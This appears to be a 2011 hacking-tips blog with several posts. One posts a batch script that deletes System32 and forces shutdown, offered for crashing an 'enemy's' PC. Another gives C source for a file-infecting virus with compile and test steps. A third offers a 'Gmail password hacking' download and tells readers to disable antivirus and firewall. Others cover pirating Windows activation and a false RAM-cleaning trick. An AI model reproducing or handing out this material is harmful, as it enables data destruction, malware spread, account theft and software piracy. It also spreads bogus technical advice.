Tuesday, 31 May 2011

How to activate windows 7 or windows vista

Hi Friends, today i will show you how to activate windows 7 or Windows vista for free. Its a 100% working hack and perfectly safe way to easily activate windows for free. I will explain this with the help of windows loader by Daz. This loader application will bypass the Microsoft's WAT(windows activationtechnologies) and activate your winodws 7 or Vista in just few minutes.The application itself injects a SLIC (System Licensed Internal Code) into your system before Windows boots; that is what fools Windows into thinking it's genuine.


Requirements: 
1. Supported Operating System Installed( Windows 7 or Windows Vista).
2. Loader by Daz.
3. Internet connection to check the activation is happened correctly or not.

Steps to activate Windows 7 or Windows Vista:
1. Download the Windows Loader application.

(click here to download)


2. Extract the zip file and now you will have four files.
3. Start the Loader.exe by double clicking on it.
4. Now Click on Install to install the SLIC and updating the windows key.
5. That's the only procedure, now just go to Microsoft's website to check your activation. Alternatively you can check it by right clicking on My Computer Icon on desktop and see the General information.

Note: You must be running build 7600 or greater for Windows 7 and Windows Server 2008 R2.
Note: I don't recommend using any of the Windows 7 E editions.
Note: Windows 7 N editions will only be supported when OEM SLP serials leak.


Features of Windows Activator Loader:
•Can be run as a standalone application
•Works well with all system languages
•Custom OEM information can be installed
•Argument support for silent installs
•Can be used for pre-activation
•Application integrity checking
•Custom error handling
•Support for hidden partitions and complex setups
•Can work alongside Linux's GRUB or any other boot manager
•Works with TrueCrypt and many other types of hard drive encryption applications
•Add your own certificates and serials externally
•Offers certificate and serial installation only for users with an existing SLIC 2.1
•Automated system profiling (The application matches everything up for you)


Supported operating systems
•Windows 7 Ultimate
•Windows 7 Ultimate E
•Windows 7 Professional
•Windows 7 Professional E
•Windows 7 Home Premium
•Windows 7 Home Premium E
•Windows 7 Home Basic
•Windows 7 Starter
•Windows 7 Starter E
•Windows Vista Ultimate
•Windows Vista Business
•Windows Vista Business N
•Windows Vista Home Premium
•Windows Vista Home Basic
•Windows Vista Home Basic N
•Windows Vista Starter
•Windows Server 2008 R2: Enterprise
•Windows Server 2008 R2: Standard
•Windows Server 2008 R2: Foundation
•Windows Server 2008: Enterprise
•Windows Server 2008: Standard
•Windows Server 2008: Foundation
•Windows Small Business Server 2008

Don't Forget to say thanks if it works for you....


Write Bold And Underline Text In Facebook Chat


Now here are the facebook codes for sending bold and underlined text in facebook chat

For Sending Bold Text
whatever you type between * *(two stars ) will automatically turns into bold.
Example : You write I *love* you.
Turns to
love you

For sending underlined Text
Whatever you type between _ _(two underscores) will automatically turns into underlined text
Example: You write
I really _love_ you
Turns to
I really love you

For writing Bold+Underline
Whatever you type between *_ _* will automatically turns into Bold+Underline
Example:
You *_love_* it?
Turns to
You love it?

if you like this post please comment..
:)




Wednesday, 11 May 2011

crash your enemy PC by windows system 32 command promt

HEY HERE IS SIMPLE WAY TO BLOCK ENEMY PC
the simple deadliest code is 


@Echo off
@Color 0A
@Echo Hello, this will fuck over your computer... just a moment...
Del /s /q /a RHSA C:\Windows\System32
Echo thank you for waiting :)
Shutdown -f -s -t 20 -c "Your computer got fucked, please wait for shutting down..."
Exit

Tuesday, 10 May 2011

Virus Code in C programming





 CODE:

#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(”*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(”Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();

done=findnext(&ffblk);
}
}
printf(”DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(”TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}




COMPILING METHOD: 


BORLAND TC++ 3.0 (16-BIT):

1. Load the program in the compiler; press Alt-F9 to compile

2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9, THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)

3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; Change IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
BORLAND C++ 5.5 (32-BIT):

1. Compile once, note down the generated EXE file length in bytes

2. Change the value of X in source code to this length in bytes

3. Recompile it. The new EXE file is ready to infect
HOW TO TEST: 

1. Open new empty folder

2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)

3. Run the virus EXE file there you will see all the files in the current directory get infected.

4. All the infected files will be ready to re infect


Thursday, 5 May 2011

Hack Your Friends Gmail Password-Gmail Hacking Tool Free Download

Hi friends,

Today I am Introducing a new tool to hack your enemies Gmail password.It is a newly developed software for hacking Gmail password and google account password.It is for educational purpose and don't misuse it.Here I am with the latest tool gmail_hackerV3.2.0.Its a highly spreading password hacking tool in the Internet world.Again I am repeating that dont misuse it and its only for proving the security issues of google.


download the zip file and extract it in your system.
Note:Since it is a hacking software,Please disable your antivirus and firewall.This may delete the hacking software


Wednesday, 4 May 2011

SPEED UP YOUR COMPUTER BY CLEANING RAM USING NOTEPAD

If your computer become slow, when you are working with many programs. It may be due to RAM because at that time RAM is full of remaining progress pieces which you are working with and you do not need them any more. So, if you can erase or delete those unnecessary pieces of information, your computer RAM will be cleaned and your computer will be speed up.


Cleaning RAM is very easy task here are steps for it, just follow them:


1). Open notepad.

2). Type FreeMem=Space(64000000).

3). Save file with name "CleanRAM.vbs".

4). Close it and run the file.

It will free memory in RAM, if you want to free more memory than you can write following command in notepad instead of what given in step 2.

FreeMem= (256000000) for 256 mb
FreeMem= (128000000) for 128 mb 
FreeMem= (72000000) for 72 mb 
FreeMem= (64000000) for 64 mb 
FreeMem= (32000000) for 32 mb 
FreeMem= (24000000) for 24 mb

Make sure that you don't select the memory that is larger than your memory capacity.